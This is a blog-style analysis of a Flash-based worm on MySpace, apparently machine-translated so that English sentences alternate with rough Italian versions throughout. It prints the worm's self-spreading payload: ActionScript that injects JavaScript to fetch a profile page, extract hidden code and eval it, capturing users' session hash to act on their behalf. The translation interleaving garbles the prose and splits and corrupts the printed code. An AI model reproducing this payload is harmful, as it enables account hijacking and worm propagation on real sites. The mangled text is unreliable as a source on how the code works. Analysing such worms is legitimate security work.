MySpace has been infected by Flash based (swf) worm which spreading rapidly through MySpace. MySpace è stato infettato da Flash basa (swf) worm che diffonde rapidamente attraverso MySpace. It is embedding JavaScript code into users’ profiles that redirects visitors to a site claiming the US government was behind the 9/11 terrorist attacks, Symantec E 'l'incorporamento di codice JavaScript in utenti' profili che reindirizza i visitatori a un sito rivendicare il governo degli Stati Uniti è stato dietro il 9 / 11 attacchi terroristici, Symantec warned ha messo in guardia Monday. Lunedi. However it may be just the tip of the iceberg. Tuttavia può essere solo la punta di un iceberg. Let’s take a look at how it works to understand how it can be easily modified to deliver much devastating payloads. Diamo un'occhiata a come funziona per capire in che modo può essere facilmente modificata in modo da offrire molto più devastanti carichi utili.

The unnamed worm isn’t malicious but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who views the .swf file. Il worm senza nome non è dannoso, ma la Shockwave Flash (. Swf) file che contiene il carico utile oggetti incorporabili JavaScript nel profilo MySpace di qualsiasi utente che le opinioni. Swf file. This can easily replicate Questo può facilmente replicare Samy is my friend Samy è mio amico worm without breaking a sweat. worm senza rompere uno sudore.

This javascript code would then be interpreted by any user who visited the site, allowing sensitive data to be stolen, such as a hash value required to carry out operations as a user, and performing operations on behalf of that users (without consent obviously). Questo codice javascript quindi essere interpretato da qualsiasi utente che la visita del sito, consentendo dati sensibili di essere rubati, come ad esempio un valore di hash tenuto a procedere ad operazioni come utente, e che svolgono operazioni a nome di che gli utenti (senza il consenso ovviamente). Currently, that access is being used only to spread the JavaScript code to other profiles on the popular social network site. Attualmente, che l'accesso viene utilizzato solo per la diffusione del codice JavaScript ad altri profili sul popolare sito della rete sociale.

If the payload is malicious, it can carry out secondary attacks like targeting recently discovered vulnerabilities affecting Microsoft Office content. Se il carico utile è dannoso, può effettuare attacchi secondari come il targeting per vulnerabilità di recente scoperta che riguardano il contenuto di Microsoft Office. The impact would be much higher exposing even sensitive information on your hard-disk. L'impatto sarebbe molto più elevato di esporre anche informazioni sensibili sul vostro hard-disk.

Let’s take a look at the worm, thanks to research by Diamo un'occhiata a un worm, grazie alla ricerca di kinematic.theory :

When you visited an already infected page, there is a Flash object embedded (”redirect.swf”) which contains the actionscript: Quando avete visitato uno già infetti pagina, vi è un oggetto Flash incorporato ( "redirect.swf") che contiene il ActionScript:
getURL(" getURL ( " url URL “); ");

It opens and redirects you to the specified blog URL. Si apre e si reindirizza a un determinato blog.

On this blog url there is another flash file embedded - “retrievecookie.swf”. Su questo URL del blog c'è un altro file flash incorporato - "retrievecookie.swf". It contains: Essa contiene:

getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\' getURL ( "javas \ n \ rcript: var x = new ActiveXObject (\ 'Msxml2.XMLHTTP \'); x.open (\ 'GET \', \ 'http://editprofile.myspace.com/index.cfm? fuseaction = user.HomeComments & friendID = 93634373 \ ', true); x.onreadystatechange = function () (if (x.readyState == 4) (var pg = x.responseText; var sc = pg.substring (pg.indexOf (\ 'BX-\') +3, pg.indexOf (\ 'EX-\')); while ((sc.indexOf (\ '
\’)!=-1)||(sc.indexOf(\’-XXX\’)!=-1)){var n=sc.indexOf(\’ \')!=- 1) | | (sc.indexOf (\ '-XXX \')!=- 1)) (var n = sc.indexOf (\'
\’);if(n==-1)n=sc.indexOf(\’-XXX\’);sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};” + “eval(sc);}};” + “x.send(null);”, “”); \ '); If (n ==- 1) n = sc.indexOf (\'-XXX \ '); sc.substring sc = (0, n) + sc.substring (n +5, sc.length); ); "+" Eval (sc );}};" + "x.send (null);", "");

It opens another blog post ( Si apre un altro post del blog ( link collegamento ) and evaluates its contents. ) E valuta il contenuto.

This code gets your MySpace hash which allows anyone to act as you on MySpace and perform any operations on your behalf like changing your password or adding someone unknown as your friend, anything you can do on MySpace. Questo codice viene il tuo MySpace hash che consente a chiunque di agire come lei su MySpace e di eseguire qualsiasi operazione sul vostro nome come cambiare la password o aggiungere qualcuno sconosciuto come il tuo amico, nulla si può fare su MySpace. Currently the code adds a message to your MySpace profile. Attualmente il codice aggiunge un messaggio al tuo profilo MySpace. It extensively use AJAX for its operations. E 'ampiamente uso AJAX per le sue operazioni.